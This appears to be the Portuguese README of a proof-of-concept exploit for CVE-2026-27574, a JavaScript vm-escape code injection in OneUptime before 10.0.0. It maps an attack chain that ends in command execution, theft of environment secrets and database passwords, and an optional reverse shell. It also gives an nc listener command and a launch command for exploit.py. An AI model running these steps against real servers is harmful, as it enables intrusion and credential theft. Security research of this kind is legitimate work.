
Prova de conceito de exploit para CVE-2026-27574, uma injeção de código crítica no OneUptime que permite execução remota de código e vazamento de variáveis de ambiente.
Exploit de Prova de Conceito para CVE-2026-27574 – uma vulnerabilidade crítica de injeção de código (CWE-94) no OneUptime < 10.0.0 que permite execução arbitrária de JavaScript no contexto do probe, levando a completa e vazamento de variáveis de ambiente sensíveis.
Corrigido em: OneUptime 10.0.0 (migração para isolated-vm)
Tipo de exploit: Remoto
Autenticação: Baixo privilégio (qualquer membro registrado do projeto)
Impacto: Comprometimento total do servidor, roubo de credenciais, tomada do cluster
flowchart TD
A[Start] --> B[Open Registration]
B --> C[Register New Account]
C --> D[Create New Project]
D --> E[Obtain ProjectMember Role]
E --> F[Create Custom JavaScript Monitor]
F --> G[Inject Malicious vm Escape Payload]
G --> H[Probe Executes Code Every ~60s]
H --> I[Escape vm Context via constructor chain]
I --> J[Access process & child_process]
J --> K[Execute System Commands]
J --> L[Leak Environment Variables]
K --> M[Read /etc/passwd, id, hostname, etc.]
L --> N[Extract ONEUPTIME_SECRET, DB/Redis passwords, etc.]
M --> O[Full RCE Achieved]
N --> O
O --> P[Optional: Reverse Shell / Data Exfiltration]
P --> Q[End - System Compromised]# Iniciar listener (se usar reverse shell)
nc -lvnp 4444
# Executar o exploit
python3 exploit.py http://target:3002 --lhost SEU_IP --lport 4444
requests (pip install requests)Este código é fornecido apenas para fins educacionais e de testes de segurança autorizados.
O uso não autorizado contra sistemas que você não possui ou para os quais não tem permissão explícita para testar é ilegal e antiético.
Desenvolvido por Mohammed Idrees Banyamer • Jordânia • @banyamer_security